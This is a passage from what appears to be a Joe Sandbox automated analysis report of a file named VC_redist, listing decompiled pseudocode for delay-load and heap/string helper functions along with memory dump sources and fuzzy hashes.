                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 5dcba69e16ec1d63bc91fec20979e02ee31e8ebf0ce725ea1a35dd202a166fb6
                                                                          • Instruction ID: a30210e0c668d3ae93cef8ea734143278d4c1b05199133dc7d7f85daf8671c0b
                                                                          • Opcode Fuzzy Hash: 5dcba69e16ec1d63bc91fec20979e02ee31e8ebf0ce725ea1a35dd202a166fb6
                                                                          • Instruction Fuzzy Hash: 75B0128526950E6C335C62151D03EBA010CC7C4F10331C27BB700C34C1EE401CCB2032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000F9506() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a964); // executed
                                                                          				goto __eax;
                                                                          			}

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 6cb9ace564436da405fac16629831ebe7689edbaf6bd33efec11e46ced946778
                                                                          • Instruction ID: 50a837471607b082e39f0c9344c68b4d54e1cae27a549935a0678df08792f049
                                                                          • Opcode Fuzzy Hash: 6cb9ace564436da405fac16629831ebe7689edbaf6bd33efec11e46ced946778
                                                                          • Instruction Fuzzy Hash: 25B092852696096C225862552A42EBA0108CBC4B10321817AB204D2482AA401CC76032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B1360(WCHAR** _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				unsigned int _v16;
                                                                          				void* _t22;
                                                                          				signed int _t26;
                                                                          				signed int* _t28;
                                                                          				int _t31;
                                                                          				unsigned int _t32;
                                                                          				signed int _t34;
                                                                          				signed int _t38;
                                                                          				unsigned int _t39;
                                                                          				unsigned int _t40;
                                                                          				WCHAR** _t41;
                                                                          				void* _t42;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t41 = _a4;
                                                                          				_v12 = _v12 & 0;
                                                                          				_v16 = 0;
                                                                          				if( *_t41 == 0) {
                                                                          					L4:
                                                                          					_t32 = 0x100;
                                                                          					_t22 = E000B143C(_t41, 0x100, _a8); // executed
                                                                          					_t42 = _t22;
                                                                          					if(_t42 >= 0) {
                                                                          						goto L5;
                                                                          					}
                                                                          				} else {
                                                                          					_t40 = E000B3B51( *_t41);
                                                                          					_v16 = _t40;
                                                                          					if(_t40 != 0xffffffff) {
                                                                          						_t31 = lstrlenW( *_t41);
                                                                          						_t32 = _t40 >> 1;
                                                                          						_v12 = _t31;
                                                                          						if(_t32 != 0) {
                                                                          							L5:
                                                                          							_t38 = _v8;
                                                                          							do {
                                                                          								_t42 = E000B1C90( *_a4, _t32, _a12, _a16);
                                                                          								if(_t42 != 0x8007007a) {
                                                                          									goto L11;
                                                                          								} else {
                                                                          									_t28 = _a4;
                                                                          									if(_t38 == 0) {
                                                                          										_t38 =  *_t28;
                                                                          										 *_t28 =  *_t28 & 0x00000000;
                                                                          										 *((short*)(_t38 + _v12 * 2)) = 0;
                                                                          									}
                                                                          									_t32 = _t32 + _t32;
                                                                          									_t42 = E000B143C(_t28, _t32, _a8);
                                                                          									if(_t42 >= 0) {
                                                                          										_t42 = 1;
                                                                          										goto L11;
                                                                          									}
                                                                          								}
                                                                          								break;
                                                                          								L11:
                                                                          							} while (_t42 == 1);
                                                                          							_t26 = _t38;
                                                                          							_v8 = _t38;
                                                                          							_t39 = _v16;
                                                                          							if(_t26 != 0) {
                                                                          								if(_a8 != 0) {
                                                                          									_t34 = _t26;
                                                                          									if(_t39 != 0) {
                                                                          										do {
                                                                          											 *_t34 = 0;
                                                                          											_t34 = _t34 + 1;
                                                                          											_t39 = _t39 - 1;
                                                                          										} while (_t39 != 0);
                                                                          									}
                                                                          								}
                                                                          								E000B3999(_t26);
                                                                          							}
                                                                          						} else {
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_t42 = 0x80070057;
                                                                          					}
                                                                          				}
                                                                          				return _t42;
                                                                          			}


















                                                                          APIs
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?), ref: 000B139B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 155fef6a26517d97b8ced305af350876fe2dc4f20cd7ad30a8452ab9b1f9e74d
                                                                          • Instruction ID: 0e82e11fd083eb1041a8fd08e809dfc81d4c96a4d044b552917800f530457660
                                                                          • Opcode Fuzzy Hash: 155fef6a26517d97b8ced305af350876fe2dc4f20cd7ad30a8452ab9b1f9e74d
                                                                          • Instruction Fuzzy Hash: 5C210532D00214EFCB129F68D850BEEB7F9EF84760FA58169ED50AB251D7319E119BC0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000B14B2(unsigned int _a4, WCHAR* _a8, unsigned int _a12, intOrPtr _a16) {
                                                                          				unsigned int _t9;
                                                                          				signed int _t10;
                                                                          				signed int _t13;
                                                                          				signed int _t14;
                                                                          				unsigned int _t15;
                                                                          				void* _t16;
                                                                          				unsigned int _t18;
                                                                          				unsigned int _t20;
                                                                          				unsigned int _t21;
                                                                          
                                                                          				_t9 = _a4;
                                                                          				_t20 = 0;
                                                                          				_t14 = _t13 | 0xffffffff;
                                                                          				if( *_t9 == 0) {
                                                                          					L4:
                                                                          					_t18 = _a12;
                                                                          					if(_t18 == 0) {
                                                                          						_t9 = lstrlenW(_a8);
                                                                          						_t18 = _t9;
                                                                          					}
                                                                          					_t4 = _t18 + 1; // 0x1
                                                                          					_t16 = _t4;
                                                                          					_t15 =  >=  ? _t16 : _t14;
                                                                          					asm("sbb eax, eax");
                                                                          					_t10 = _t9 & 0x80070216;
                                                                          					if(_t16 < _t18) {
                                                                          						L10:
                                                                          						return _t10;
                                                                          					} else {
                                                                          						if(_t20 >= _t15) {
                                                                          							L9:
                                                                          							_t10 = E000B1A6E(_t16,  *_a4, _t20, _a8, _t18, 0, 0, 0x200);
                                                                          							goto L10;
                                                                          						}
                                                                          						_t20 = _t15;
                                                                          						_t10 = E000B143C(_a4, _t15, _a16); // executed
                                                                          						if(_t10 < 0) {
                                                                          							goto L10;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          				}
                                                                          				_t9 = E000B3B51( *_t9);
                                                                          				_t21 = _t9;
                                                                          				if(_t21 != _t14) {
                                                                          					_t20 = _t21 >> 1;
                                                                          					goto L4;
                                                                          				}
                                                                          				return 0x80070057;
                                                                          			}













                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,000B21B8,?,00000000,00000000,00000000,?,000C8A22,00000000,00000000,00000000,00000000), ref: 000B14E4
                                                                            • Part of subcall function 000B3B51: GetProcessHeap.KERNEL32(00000000,?,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?), ref: 000B3B59
                                                                            • Part of subcall function 000B3B51: HeapSize.KERNEL32(00000000,?,000B3ADE,?,00000000,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511), ref: 000B3B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 7bb844d91ad419550c5250d0fe316fc847cccb6934d34b85336c25613ba7dcbd
                                                                          • Instruction ID: 92d8b0726f0047d054927bb59f0e441e32120235a3d5f64b95f32731db08f911
                                                                          • Opcode Fuzzy Hash: 7bb844d91ad419550c5250d0fe316fc847cccb6934d34b85336c25613ba7dcbd
                                                                          • Instruction Fuzzy Hash: AB01F137200218AFCF215E64DCA4FEA779AAF81760F618225FA259B161D732AC509AD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%